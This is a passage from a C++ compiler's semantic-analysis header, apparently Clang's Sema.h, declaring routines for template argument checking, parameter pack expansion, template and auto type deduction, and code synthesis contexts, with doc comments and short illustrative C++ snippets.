/// \param PartialTemplateArgs True if the list of template arguments is
/// intentionally partial, e.g., because we're checking just the initial
/// set of template arguments.
///
/// \param Converted Will receive the converted, canonicalized template
/// arguments.
///
/// \param UpdateArgsWithConversions If \c true, update \p TemplateArgs to
/// contain the converted forms of the template arguments as written.
/// Otherwise, \p TemplateArgs will not be modified.
///
/// \param ConstraintsNotSatisfied If provided, and an error occurred, will
/// receive true if the cause for the error is the associated constraints of
/// the template not being satisfied by the template arguments.
///
/// \returns true if an error occurred, false otherwise.
bool CheckTemplateArgumentList(TemplateDecl *Template,
SourceLocation TemplateLoc,
TemplateArgumentListInfo &TemplateArgs,
bool PartialTemplateArgs,
SmallVectorImpl<TemplateArgument> &Converted,
bool UpdateArgsWithConversions = true,
bool *ConstraintsNotSatisfied = nullptr);
bool CheckTemplateTypeArgument(TemplateTypeParmDecl *Param,
TemplateArgumentLoc &Arg,
SmallVectorImpl<TemplateArgument> &Converted);
bool CheckTemplateArgument(TemplateTypeParmDecl *Param,
TypeSourceInfo *Arg);
ExprResult CheckTemplateArgument(NonTypeTemplateParmDecl *Param,
QualType InstantiatedParamType, Expr *Arg,
TemplateArgument &Converted,
CheckTemplateArgumentKind CTAK = CTAK_Specified);
bool CheckTemplateTemplateArgument(TemplateParameterList *Params,
TemplateArgumentLoc &Arg);
ExprResult
BuildExpressionFromDeclTemplateArgument(const TemplateArgument &Arg,
QualType ParamType,
SourceLocation Loc);
ExprResult
BuildExpressionFromIntegralTemplateArgument(const TemplateArgument &Arg,
SourceLocation Loc);
/// Enumeration describing how template parameter lists are compared
/// for equality.
enum TemplateParameterListEqualKind {
/// We are matching the template parameter lists of two templates
/// that might be redeclarations.
///
/// \code
/// template<typename T> struct X;
/// template<typename T> struct X;
/// \endcode
TPL_TemplateMatch,
/// We are matching the template parameter lists of two template
/// template parameters as part of matching the template parameter lists
/// of two templates that might be redeclarations.
///
/// \code
/// template<template<int I> class TT> struct X;
/// template<template<int Value> class Other> struct X;
/// \endcode
TPL_TemplateTemplateParmMatch,
/// We are matching the template parameter lists of a template
/// template argument against the template parameter lists of a template
/// template parameter.
///
/// \code
/// template<template<int Value> class Metafun> struct X;
/// template<int Value> struct integer_c;
/// X<integer_c> xic;
/// \endcode
TPL_TemplateTemplateArgumentMatch
};
bool TemplateParameterListsAreEqual(TemplateParameterList *New,
TemplateParameterList *Old,
bool Complain,
TemplateParameterListEqualKind Kind,
SourceLocation TemplateArgLoc
= SourceLocation());
bool CheckTemplateDeclScope(Scope *S, TemplateParameterList *TemplateParams);
/// Called when the parser has parsed a C++ typename
/// specifier, e.g., "typename T::type".
///
/// \param S The scope in which this typename type occurs.
/// \param TypenameLoc the location of the 'typename' keyword
/// \param SS the nested-name-specifier following the typename (e.g., 'T::').
/// \param II the identifier we're retrieving (e.g., 'type' in the example).
/// \param IdLoc the location of the identifier.
TypeResult
ActOnTypenameType(Scope *S, SourceLocation TypenameLoc,
const CXXScopeSpec &SS, const IdentifierInfo &II,
SourceLocation IdLoc);
/// Called when the parser has parsed a C++ typename
/// specifier that ends in a template-id, e.g.,
/// "typename MetaFun::template apply<T1, T2>".
///
/// \param S The scope in which this typename type occurs.
/// \param TypenameLoc the location of the 'typename' keyword
/// \param SS the nested-name-specifier following the typename (e.g., 'T::').
/// \param TemplateLoc the location of the 'template' keyword, if any.
/// \param TemplateName The template name.
/// \param TemplateII The identifier used to name the template.
/// \param TemplateIILoc The location of the template name.
/// \param LAngleLoc The location of the opening angle bracket ('<').
/// \param TemplateArgs The template arguments.
/// \param RAngleLoc The location of the closing angle bracket ('>').
TypeResult
ActOnTypenameType(Scope *S, SourceLocation TypenameLoc,
const CXXScopeSpec &SS,
SourceLocation TemplateLoc,
TemplateTy TemplateName,
IdentifierInfo *TemplateII,
SourceLocation TemplateIILoc,
SourceLocation LAngleLoc,
ASTTemplateArgsPtr TemplateArgs,
SourceLocation RAngleLoc);
QualType CheckTypenameType(ElaboratedTypeKeyword Keyword,
SourceLocation KeywordLoc,
NestedNameSpecifierLoc QualifierLoc,
const IdentifierInfo &II,
SourceLocation IILoc);
TypeSourceInfo *RebuildTypeInCurrentInstantiation(TypeSourceInfo *T,
SourceLocation Loc,
DeclarationName Name);
bool RebuildNestedNameSpecifierInCurrentInstantiation(CXXScopeSpec &SS);
ExprResult RebuildExprInCurrentInstantiation(Expr *E);
bool RebuildTemplateParamsInCurrentInstantiation(
TemplateParameterList *Params);
std::string
getTemplateArgumentBindingsText(const TemplateParameterList *Params,
const TemplateArgumentList &Args);
std::string
getTemplateArgumentBindingsText(const TemplateParameterList *Params,
const TemplateArgument *Args,
unsigned NumArgs);
// Concepts
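/// An illustrative concept definition this callback receives:
/// \code
/// template<typename T> concept Small = sizeof(T) <= 4;
/// \endcode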
Decl *ActOnConceptDefinition(
Scope *S, MultiTemplateParamsArg TemplateParameterLists,
IdentifierInfo *Name, SourceLocation NameLoc, Expr *ConstraintExpr);
//===--------------------------------------------------------------------===//
// C++ Variadic Templates (C++0x [temp.variadic])
//===--------------------------------------------------------------------===//
/// Determine whether an unexpanded parameter pack might be permitted in this
/// location. Useful for error recovery.
bool isUnexpandedParameterPackPermitted();
/// The context in which an unexpanded parameter pack is
/// being diagnosed.
///
/// Note that the values of this enumeration line up with the first
/// argument to the \c err_unexpanded_parameter_pack diagnostic.
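/// An illustrative UPPC_Expression diagnostic ('g' is a placeholder):
/// \code
/// template<typename ...Ts> int f(Ts ...ts) { return g(ts); } // 'ts' unexpanded
/// \endcode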
enum UnexpandedParameterPackContext {
/// An arbitrary expression.
UPPC_Expression = 0,
/// The base type of a class type.
UPPC_BaseType,
/// The type of an arbitrary declaration.
UPPC_DeclarationType,
/// The type of a data member.
UPPC_DataMemberType,
/// The size of a bit-field.
UPPC_BitFieldWidth,
/// The expression in a static assertion.
UPPC_StaticAssertExpression,
/// The fixed underlying type of an enumeration.
UPPC_FixedUnderlyingType,
/// The enumerator value.
UPPC_EnumeratorValue,
/// A using declaration.
UPPC_UsingDeclaration,
/// A friend declaration.
UPPC_FriendDeclaration,
/// A declaration qualifier.
UPPC_DeclarationQualifier,
/// An initializer.
UPPC_Initializer,
/// A default argument.
UPPC_DefaultArgument,
/// The type of a non-type template parameter.
UPPC_NonTypeTemplateParameterType,
/// The type of an exception.
UPPC_ExceptionType,
/// Partial specialization.
UPPC_PartialSpecialization,
/// Microsoft __if_exists.
UPPC_IfExists,
/// Microsoft __if_not_exists.
UPPC_IfNotExists,
/// Lambda expression.
UPPC_Lambda,
/// Block expression.
UPPC_Block
};
/// Diagnose unexpanded parameter packs.
///
/// \param Loc The location at which we should emit the diagnostic.
///
/// \param UPPC The context in which we are diagnosing unexpanded
/// parameter packs.
///
/// \param Unexpanded the set of unexpanded parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPacks(SourceLocation Loc,
UnexpandedParameterPackContext UPPC,
ArrayRef<UnexpandedParameterPack> Unexpanded);
/// If the given type contains an unexpanded parameter pack,
/// diagnose the error.
///
/// \param Loc The source location where a diagnostic should be emitted.
///
/// \param T The type that is being checked for unexpanded parameter
/// packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(SourceLocation Loc, TypeSourceInfo *T,
UnexpandedParameterPackContext UPPC);
/// If the given expression contains an unexpanded parameter
/// pack, diagnose the error.
///
/// \param E The expression that is being checked for unexpanded
/// parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(Expr *E,
UnexpandedParameterPackContext UPPC = UPPC_Expression);
/// If the given nested-name-specifier contains an unexpanded
/// parameter pack, diagnose the error.
///
/// \param SS The nested-name-specifier that is being checked for
/// unexpanded parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(const CXXScopeSpec &SS,
UnexpandedParameterPackContext UPPC);
/// If the given name contains an unexpanded parameter pack,
/// diagnose the error.
///
/// \param NameInfo The name (with source location information) that
/// is being checked for unexpanded parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(const DeclarationNameInfo &NameInfo,
UnexpandedParameterPackContext UPPC);
/// If the given template name contains an unexpanded parameter pack,
/// diagnose the error.
///
/// \param Loc The location of the template name.
///
/// \param Template The template name that is being checked for unexpanded
/// parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(SourceLocation Loc,
TemplateName Template,
UnexpandedParameterPackContext UPPC);
/// If the given template argument contains an unexpanded parameter
/// pack, diagnose the error.
///
/// \param Arg The template argument that is being checked for unexpanded
/// parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(TemplateArgumentLoc Arg,
UnexpandedParameterPackContext UPPC);
/// Collect the set of unexpanded parameter packs within the given
/// template argument.
///
/// \param Arg The template argument that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(TemplateArgument Arg,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// template argument.
///
/// \param Arg The template argument that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(TemplateArgumentLoc Arg,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// type.
///
/// \param T The type that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(QualType T,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// type.
///
/// \param TL The type that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(TypeLoc TL,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// nested-name-specifier.
///
/// \param NNS The nested-name-specifier that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(NestedNameSpecifierLoc NNS,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// name.
///
/// \param NameInfo The name that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(const DeclarationNameInfo &NameInfo,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Invoked when parsing a template argument followed by an
/// ellipsis, which creates a pack expansion.
///
/// \param Arg The template argument preceding the ellipsis, which
/// may already be invalid.
///
/// \param EllipsisLoc The location of the ellipsis.
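/// For illustration:
/// \code
/// template<typename ...Ts> struct Tuple {};
/// template<typename ...Ts> using Wrap = Tuple<Ts...>; // 'Ts...' is a pack expansion
/// \endcode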
ParsedTemplateArgument ActOnPackExpansion(const ParsedTemplateArgument &Arg,
SourceLocation EllipsisLoc);
/// Invoked when parsing a type followed by an ellipsis, which
/// creates a pack expansion.
///
/// \param Type The type preceding the ellipsis, which will become
/// the pattern of the pack expansion.
///
/// \param EllipsisLoc The location of the ellipsis.
TypeResult ActOnPackExpansion(ParsedType Type, SourceLocation EllipsisLoc);
/// Construct a pack expansion type from the pattern of the pack
/// expansion.
TypeSourceInfo *CheckPackExpansion(TypeSourceInfo *Pattern,
SourceLocation EllipsisLoc,
Optional<unsigned> NumExpansions);
/// Construct a pack expansion type from the pattern of the pack
/// expansion.
QualType CheckPackExpansion(QualType Pattern,
SourceRange PatternRange,
SourceLocation EllipsisLoc,
Optional<unsigned> NumExpansions);
/// Invoked when parsing an expression followed by an ellipsis, which
/// creates a pack expansion.
///
/// \param Pattern The expression preceding the ellipsis, which will become
/// the pattern of the pack expansion.
///
/// \param EllipsisLoc The location of the ellipsis.
ExprResult ActOnPackExpansion(Expr *Pattern, SourceLocation EllipsisLoc);
/// Invoked when parsing an expression followed by an ellipsis, which
/// creates a pack expansion.
///
/// \param Pattern The expression preceding the ellipsis, which will become
/// the pattern of the pack expansion.
///
/// \param EllipsisLoc The location of the ellipsis.
ExprResult CheckPackExpansion(Expr *Pattern, SourceLocation EllipsisLoc,
Optional<unsigned> NumExpansions);
/// Determine whether we could expand a pack expansion with the
/// given set of parameter packs into separate arguments by repeatedly
/// transforming the pattern.
///
/// \param EllipsisLoc The location of the ellipsis that identifies the
/// pack expansion.
///
/// \param PatternRange The source range that covers the entire pattern of
/// the pack expansion.
///
/// \param Unexpanded The set of unexpanded parameter packs within the
/// pattern.
///
/// \param ShouldExpand Will be set to \c true if the transformer should
/// expand the corresponding pack expansions into separate arguments. When
/// set, \c NumExpansions must also be set.
///
/// \param RetainExpansion Whether the caller should add an unexpanded
/// pack expansion after all of the expanded arguments. This is used
/// when extending explicitly-specified template argument packs per
/// C++0x [temp.arg.explicit]p9.
///
/// \param NumExpansions The number of separate arguments that will be in
/// the expanded form of the corresponding pack expansion. This is both an
/// input and an output parameter, which can be set by the caller if the
/// number of expansions is known a priori (e.g., due to a prior substitution)
/// and will be set by the callee when the number of expansions is known.
/// The callee must set this value when \c ShouldExpand is \c true; it may
/// set this value in other cases.
///
/// \returns true if an error occurred (e.g., because the parameter packs
/// are to be instantiated with arguments of different lengths), false
/// otherwise. If false, \c ShouldExpand (and possibly \c NumExpansions)
/// must be set.
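/// An illustrative length mismatch this detects:
/// \code
/// template<typename ...As> struct P {
///   template<typename ...Bs> void f(std::pair<As, Bs> ...); // As/Bs lengths must agree
/// };
/// \endcode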
bool CheckParameterPacksForExpansion(SourceLocation EllipsisLoc,
SourceRange PatternRange,
ArrayRef<UnexpandedParameterPack> Unexpanded,
const MultiLevelTemplateArgumentList &TemplateArgs,
bool &ShouldExpand,
bool &RetainExpansion,
Optional<unsigned> &NumExpansions);
/// Determine the number of arguments in the given pack expansion
/// type.
///
/// This routine assumes that the number of arguments in the expansion is
/// consistent across all of the unexpanded parameter packs in its pattern.
///
/// Returns an empty Optional if the type can't be expanded.
Optional<unsigned> getNumArgumentsInExpansion(QualType T,
const MultiLevelTemplateArgumentList &TemplateArgs);
/// Determine whether the given declarator contains any unexpanded
/// parameter packs.
///
/// This routine is used by the parser to disambiguate function declarators
/// with an ellipsis prior to the ')', e.g.,
///
/// \code
/// void f(T...);
/// \endcode
///
/// To determine whether we have an (unnamed) function parameter pack or
/// a variadic function.
///
/// \returns true if the declarator contains any unexpanded parameter packs,
/// false otherwise.
bool containsUnexpandedParameterPacks(Declarator &D);
/// Returns the pattern of the pack expansion for a template argument.
///
/// \param OrigLoc The template argument to expand.
///
/// \param Ellipsis Will be set to the location of the ellipsis.
///
/// \param NumExpansions Will be set to the number of expansions that will
/// be generated from this pack expansion, if known a priori.
TemplateArgumentLoc getTemplateArgumentPackExpansionPattern(
TemplateArgumentLoc OrigLoc,
SourceLocation &Ellipsis,
Optional<unsigned> &NumExpansions) const;
/// Given a template argument that contains an unexpanded parameter pack, but
/// which has already been substituted, attempt to determine the number of
/// elements that will be produced once this argument is fully-expanded.
///
/// This is intended for use when transforming 'sizeof...(Arg)' in order to
/// avoid actually expanding the pack where possible.
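/// Illustrative case: with \c Ts already substituted to <int, char>,
/// \c sizeof...(Ts) can be evaluated to 2 without expanding the pack.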
Optional<unsigned> getFullyPackExpandedSize(TemplateArgument Arg);
//===--------------------------------------------------------------------===//
// C++ Template Argument Deduction (C++ [temp.deduct])
//===--------------------------------------------------------------------===//
/// Adjust the type \p ArgFunctionType to match the calling convention,
/// noreturn, and optionally the exception specification of \p FunctionType.
/// Deduction often wants to ignore these properties when matching function
/// types.
QualType adjustCCAndNoReturn(QualType ArgFunctionType, QualType FunctionType,
bool AdjustExceptionSpec = false);
/// Describes the result of template argument deduction.
///
/// The TemplateDeductionResult enumeration describes the result of
/// template argument deduction, as returned from
/// DeduceTemplateArguments(). The separate TemplateDeductionInfo
/// structure provides additional information about the results of
/// template argument deduction, e.g., the deduced template argument
/// list (if successful) or the specific template parameters or
/// deduced arguments that were involved in the failure.
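/// An illustrative TDK_Inconsistent failure:
/// \code
/// template<typename T> void f(T, T);
/// void g() { f(1, 'a'); } // T deduced as both int and char
/// \endcode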
enum TemplateDeductionResult {
/// Template argument deduction was successful.
TDK_Success = 0,
/// The declaration was invalid; do nothing.
TDK_Invalid,
/// Template argument deduction exceeded the maximum template
/// instantiation depth (which has already been diagnosed).
TDK_InstantiationDepth,
/// Template argument deduction did not deduce a value
/// for every template parameter.
TDK_Incomplete,
/// Template argument deduction did not deduce a value for every
/// expansion of an expanded template parameter pack.
TDK_IncompletePack,
/// Template argument deduction produced inconsistent
/// deduced values for the given template parameter.
TDK_Inconsistent,
/// Template argument deduction failed due to inconsistent
/// cv-qualifiers on a template parameter type that would
/// otherwise be deduced, e.g., we tried to deduce T in "const T"
/// but were given a non-const "X".
TDK_Underqualified,
/// Substitution of the deduced template argument values
/// resulted in an error.
TDK_SubstitutionFailure,
/// After substituting deduced template arguments, a dependent
/// parameter type did not match the corresponding argument.
TDK_DeducedMismatch,
/// After substituting deduced template arguments, an element of
/// a dependent parameter type did not match the corresponding element
/// of the corresponding argument (when deducing from an initializer list).
TDK_DeducedMismatchNested,
/// A non-dependent component of the parameter did not match the
/// corresponding component of the argument.
TDK_NonDeducedMismatch,
/// When performing template argument deduction for a function
/// template, there were too many call arguments.
TDK_TooManyArguments,
/// When performing template argument deduction for a function
/// template, there were too few call arguments.
TDK_TooFewArguments,
/// The explicitly-specified template arguments were not valid
/// template arguments for the given template.
TDK_InvalidExplicitArguments,
/// Checking non-dependent argument conversions failed.
TDK_NonDependentConversionFailure,
/// The deduced arguments did not satisfy the constraints associated
/// with the template.
TDK_ConstraintsNotSatisfied,
/// Deduction failed; that's all we know.
TDK_MiscellaneousDeductionFailure,
/// CUDA Target attributes do not match.
TDK_CUDATargetMismatch
};
TemplateDeductionResult
DeduceTemplateArguments(ClassTemplatePartialSpecializationDecl *Partial,
const TemplateArgumentList &TemplateArgs,
sema::TemplateDeductionInfo &Info);
TemplateDeductionResult
DeduceTemplateArguments(VarTemplatePartialSpecializationDecl *Partial,
const TemplateArgumentList &TemplateArgs,
sema::TemplateDeductionInfo &Info);
TemplateDeductionResult SubstituteExplicitTemplateArguments(
FunctionTemplateDecl *FunctionTemplate,
TemplateArgumentListInfo &ExplicitTemplateArgs,
SmallVectorImpl<DeducedTemplateArgument> &Deduced,
SmallVectorImpl<QualType> &ParamTypes, QualType *FunctionType,
sema::TemplateDeductionInfo &Info);
/// \brief A function argument from which we performed template argument
/// deduction for a call.
struct OriginalCallArg {
OriginalCallArg(QualType OriginalParamType, bool DecomposedParam,
unsigned ArgIdx, QualType OriginalArgType)
: OriginalParamType(OriginalParamType),
DecomposedParam(DecomposedParam), ArgIdx(ArgIdx),
OriginalArgType(OriginalArgType) {}
QualType OriginalParamType;
bool DecomposedParam;
unsigned ArgIdx;
QualType OriginalArgType;
};
TemplateDeductionResult FinishTemplateArgumentDeduction(
FunctionTemplateDecl *FunctionTemplate,
SmallVectorImpl<DeducedTemplateArgument> &Deduced,
unsigned NumExplicitlySpecified, FunctionDecl *&Specialization,
sema::TemplateDeductionInfo &Info,
SmallVectorImpl<OriginalCallArg> const *OriginalCallArgs = nullptr,
bool PartialOverloading = false,
llvm::function_ref<bool()> CheckNonDependent = []{ return false; });
TemplateDeductionResult DeduceTemplateArguments(
FunctionTemplateDecl *FunctionTemplate,
TemplateArgumentListInfo *ExplicitTemplateArgs, ArrayRef<Expr *> Args,
FunctionDecl *&Specialization, sema::TemplateDeductionInfo &Info,
bool PartialOverloading,
llvm::function_ref<bool(ArrayRef<QualType>)> CheckNonDependent);
TemplateDeductionResult
DeduceTemplateArguments(FunctionTemplateDecl *FunctionTemplate,
TemplateArgumentListInfo *ExplicitTemplateArgs,
QualType ArgFunctionType,
FunctionDecl *&Specialization,
sema::TemplateDeductionInfo &Info,
bool IsAddressOfFunction = false);
TemplateDeductionResult
DeduceTemplateArguments(FunctionTemplateDecl *FunctionTemplate,
QualType ToType,
CXXConversionDecl *&Specialization,
sema::TemplateDeductionInfo &Info);
TemplateDeductionResult
DeduceTemplateArguments(FunctionTemplateDecl *FunctionTemplate,
TemplateArgumentListInfo *ExplicitTemplateArgs,
FunctionDecl *&Specialization,
sema::TemplateDeductionInfo &Info,
bool IsAddressOfFunction = false);
/// Substitute Replacement for \p auto in \p TypeWithAuto
QualType SubstAutoType(QualType TypeWithAuto, QualType Replacement);
/// Substitute Replacement for auto in TypeWithAuto
TypeSourceInfo* SubstAutoTypeSourceInfo(TypeSourceInfo *TypeWithAuto,
QualType Replacement);
/// Completely replace the \c auto in \p TypeWithAuto by
/// \p Replacement. This does not retain any \c auto type sugar.
QualType ReplaceAutoType(QualType TypeWithAuto, QualType Replacement);
/// Result type of DeduceAutoType.
enum DeduceAutoResult {
DAR_Succeeded,
DAR_Failed,
DAR_FailedAlreadyDiagnosed
};
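/// Illustrative deductions these entry points perform:
/// \code
/// auto x = 42;       // DAR_Succeeded, Result = int
/// auto y = {1, 2.0}; // DAR_Failed: inconsistent element types
/// \endcode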
DeduceAutoResult
DeduceAutoType(TypeSourceInfo *AutoType, Expr *&Initializer, QualType &Result,
Optional<unsigned> DependentDeductionDepth = None);
DeduceAutoResult
DeduceAutoType(TypeLoc AutoTypeLoc, Expr *&Initializer, QualType &Result,
Optional<unsigned> DependentDeductionDepth = None);
void DiagnoseAutoDeductionFailure(VarDecl *VDecl, Expr *Init);
bool DeduceReturnType(FunctionDecl *FD, SourceLocation Loc,
bool Diagnose = true);
/// Declare implicit deduction guides for a class template if we've
/// not already done so.
void DeclareImplicitDeductionGuides(TemplateDecl *Template,
SourceLocation Loc);
QualType DeduceTemplateSpecializationFromInitializer(
TypeSourceInfo *TInfo, const InitializedEntity &Entity,
const InitializationKind &Kind, MultiExprArg Init);
QualType deduceVarTypeFromInitializer(VarDecl *VDecl, DeclarationName Name,
QualType Type, TypeSourceInfo *TSI,
SourceRange Range, bool DirectInit,
Expr *Init);
TypeLoc getReturnTypeLoc(FunctionDecl *FD) const;
bool DeduceFunctionTypeFromReturnExpr(FunctionDecl *FD,
SourceLocation ReturnLoc,
Expr *&RetExpr, AutoType *AT);
FunctionTemplateDecl *getMoreSpecializedTemplate(FunctionTemplateDecl *FT1,
FunctionTemplateDecl *FT2,
SourceLocation Loc,
TemplatePartialOrderingContext TPOC,
unsigned NumCallArguments1,
unsigned NumCallArguments2);
UnresolvedSetIterator
getMostSpecialized(UnresolvedSetIterator SBegin, UnresolvedSetIterator SEnd,
TemplateSpecCandidateSet &FailedCandidates,
SourceLocation Loc,
const PartialDiagnostic &NoneDiag,
const PartialDiagnostic &AmbigDiag,
const PartialDiagnostic &CandidateDiag,
bool Complain = true, QualType TargetType = QualType());
ClassTemplatePartialSpecializationDecl *
getMoreSpecializedPartialSpecialization(
ClassTemplatePartialSpecializationDecl *PS1,
ClassTemplatePartialSpecializationDecl *PS2,
SourceLocation Loc);
bool isMoreSpecializedThanPrimary(ClassTemplatePartialSpecializationDecl *T,
sema::TemplateDeductionInfo &Info);
VarTemplatePartialSpecializationDecl *getMoreSpecializedPartialSpecialization(
VarTemplatePartialSpecializationDecl *PS1,
VarTemplatePartialSpecializationDecl *PS2, SourceLocation Loc);
bool isMoreSpecializedThanPrimary(VarTemplatePartialSpecializationDecl *T,
sema::TemplateDeductionInfo &Info);
bool isTemplateTemplateParameterAtLeastAsSpecializedAs(
TemplateParameterList *P, TemplateDecl *AArg, SourceLocation Loc);
void MarkUsedTemplateParameters(const Expr *E, bool OnlyDeduced,
unsigned Depth, llvm::SmallBitVector &Used);
void MarkUsedTemplateParameters(const TemplateArgumentList &TemplateArgs,
bool OnlyDeduced,
unsigned Depth,
llvm::SmallBitVector &Used);
void MarkDeducedTemplateParameters(
const FunctionTemplateDecl *FunctionTemplate,
llvm::SmallBitVector &Deduced) {
return MarkDeducedTemplateParameters(Context, FunctionTemplate, Deduced);
}
static void MarkDeducedTemplateParameters(ASTContext &Ctx,
const FunctionTemplateDecl *FunctionTemplate,
llvm::SmallBitVector &Deduced);
//===--------------------------------------------------------------------===//
// C++ Template Instantiation
//
MultiLevelTemplateArgumentList
getTemplateInstantiationArgs(NamedDecl *D,
const TemplateArgumentList *Innermost = nullptr,
bool RelativeToPrimary = false,
const FunctionDecl *Pattern = nullptr);
/// A context in which code is being synthesized (where a source location
/// alone is not sufficient to identify the context). This covers template
/// instantiation and various forms of implicitly-generated functions.
struct CodeSynthesisContext {
/// The kind of template instantiation we are performing
enum SynthesisKind {
/// We are instantiating a template declaration. The entity is
/// the declaration we're instantiating (e.g., a CXXRecordDecl).
TemplateInstantiation,
/// We are instantiating a default argument for a template
/// parameter. The Entity is the template parameter whose argument is
/// being instantiated, the Template is the template, and the
/// TemplateArgs/NumTemplateArguments provide the template arguments as
/// specified.
DefaultTemplateArgumentInstantiation,
/// We are instantiating a default argument for a function.
/// The Entity is the ParmVarDecl, and TemplateArgs/NumTemplateArgs
/// provides the template arguments as specified.
DefaultFunctionArgumentInstantiation,
/// We are substituting explicit template arguments provided for
/// a function template. The entity is a FunctionTemplateDecl.
ExplicitTemplateArgumentSubstitution,
/// We are substituting template argument determined as part of
/// template argument deduction for either a class template
/// partial specialization or a function template. The
/// Entity is either a {Class|Var}TemplatePartialSpecializationDecl or
/// a TemplateDecl.
DeducedTemplateArgumentSubstitution,
/// We are substituting prior template arguments into a new
/// template parameter. The template parameter itself is either a
/// NonTypeTemplateParmDecl or a TemplateTemplateParmDecl.
PriorTemplateArgumentSubstitution,
/// We are checking the validity of a default template argument that
/// has been used when naming a template-id.
DefaultTemplateArgumentChecking,
/// We are computing the exception specification for a defaulted special
/// member function.
ExceptionSpecEvaluation,
/// We are instantiating the exception specification for a function
/// template which was deferred until it was needed.
ExceptionSpecInstantiation,
/// We are declaring an implicit special member function.
DeclaringSpecialMember,
/// We are declaring an implicit 'operator==' for a defaulted
/// 'operator<=>'.
DeclaringImplicitEqualityComparison,
/// We are defining a synthesized function (such as a defaulted special
/// member).
DefiningSynthesizedFunction,
// We are checking the constraints associated with a constrained entity or
// the constraint expression of a concept. This includes the checks that
// atomic constraints have the type 'bool' and that they can be constant
// evaluated.
ConstraintsCheck,
// We are substituting template arguments into a constraint expression.
ConstraintSubstitution,
// We are normalizing a constraint expression.
ConstraintNormalization,
// We are substituting into the parameter mapping of an atomic constraint
// during normalization.
ParameterMappingSubstitution,
/// We are rewriting a comparison operator in terms of an operator<=>.
RewritingOperatorAsSpaceship,
/// Added for template instantiation observation.
/// Memoization means we are _not_ instantiating a template because
/// it is already instantiated (but we entered a context where we
/// would have had to if it was not already instantiated).
Memoization
} Kind;
/// Was the enclosing context a non-instantiation SFINAE context?
bool SavedInNonInstantiationSFINAEContext;
/// The point of instantiation or synthesis within the source code.
SourceLocation PointOfInstantiation;
/// The entity that is being synthesized.
Decl *Entity;
/// The template (or partial specialization) in which we are
/// performing the instantiation, for substitutions of prior template
/// arguments.
NamedDecl *Template;
/// The list of template arguments we are substituting, if they
/// are not part of the entity.
const TemplateArgument *TemplateArgs;
// FIXME: Wrap this union around more members, or perhaps store the
// kind-specific members in the RAII object owning the context.
union {
/// The number of template arguments in TemplateArgs.
unsigned NumTemplateArgs;
/// The special member being declared or defined.
CXXSpecialMember SpecialMember;
};
ArrayRef<TemplateArgument> template_arguments() const {
assert(Kind != DeclaringSpecialMember);
return {TemplateArgs, NumTemplateArgs};
}
/// The template deduction info object associated with the
/// substitution or checking of explicit or deduced template arguments.
sema::TemplateDeductionInfo *DeductionInfo;
/// The source range that covers the construct that causes
/// the instantiation, e.g., the template-id that causes a class
/// template instantiation.
SourceRange InstantiationRange;
CodeSynthesisContext()
: Kind(TemplateInstantiation),
SavedInNonInstantiationSFINAEContext(false), Entity(nullptr),
Template(nullptr), TemplateArgs(nullptr), NumTemplateArgs(0),
DeductionInfo(nullptr) {}
/// Determines whether this template is an actual instantiation
/// that should be counted toward the maximum instantiation depth.
bool isInstantiationRecord() const;
};
/// List of active code synthesis contexts.
///
/// This vector is treated as a stack. As synthesis of one entity requires
/// synthesis of another, additional contexts are pushed onto the stack.
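///
/// A hedged sketch of the push/pop discipline (hypothetical caller; \c S is
/// a \c Sema instance, \c Loc and \c D are illustrative):
/// \code
///   CodeSynthesisContext Ctx;
///   Ctx.Kind = CodeSynthesisContext::TemplateInstantiation;
///   Ctx.PointOfInstantiation = Loc;
///   Ctx.Entity = D;
///   S.pushCodeSynthesisContext(Ctx); // paired with popCodeSynthesisContext()
///   // ... perform the synthesis work ...
///   S.popCodeSynthesisContext();
/// \endcode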
SmallVector<CodeSynthesisContext, 16> CodeSynthesisContexts;
/// Specializations whose definitions are currently being instantiated.
llvm::DenseSet<std::pair<Decl *, unsigned>> InstantiatingSpecializations;
/// Non-dependent types used in templates that have already been instantiated
/// by some template instantiation.
llvm::DenseSet<QualType> InstantiatedNonDependentTypes;
/// Extra modules inspected when performing a lookup during a template
/// instantiation. Computed lazily.
SmallVector<Module*, 16> CodeSynthesisContextLookupModules;
/// Cache of additional modules that should be used for name lookup
/// within the current template instantiation. Computed lazily; use
/// getLookupModules() to get a complete set.
llvm::DenseSet<Module*> LookupModulesCache;
/// Get the set of additional modules that should be checked during
/// name lookup. A module and its imports become visible when instantiating a
/// template defined within it.
llvm::DenseSet<Module*> &getLookupModules();
/// Map from the most recent declaration of a namespace to the most
/// recent visible declaration of that namespace.
llvm::DenseMap<NamedDecl*, NamedDecl*> VisibleNamespaceCache;
/// Whether we are in a SFINAE context that is not associated with
/// template instantiation.
///
/// This is used when setting up a SFINAE trap (see \c SFINAETrap) outside
/// of a template instantiation or template argument deduction.
bool InNonInstantiationSFINAEContext;
/// The number of \p CodeSynthesisContexts that are not template
/// instantiations and, therefore, should not be counted as part of the
/// instantiation depth.
///
/// When the instantiation depth reaches the user-configurable limit
/// \p LangOptions::InstantiationDepth we will abort instantiation.
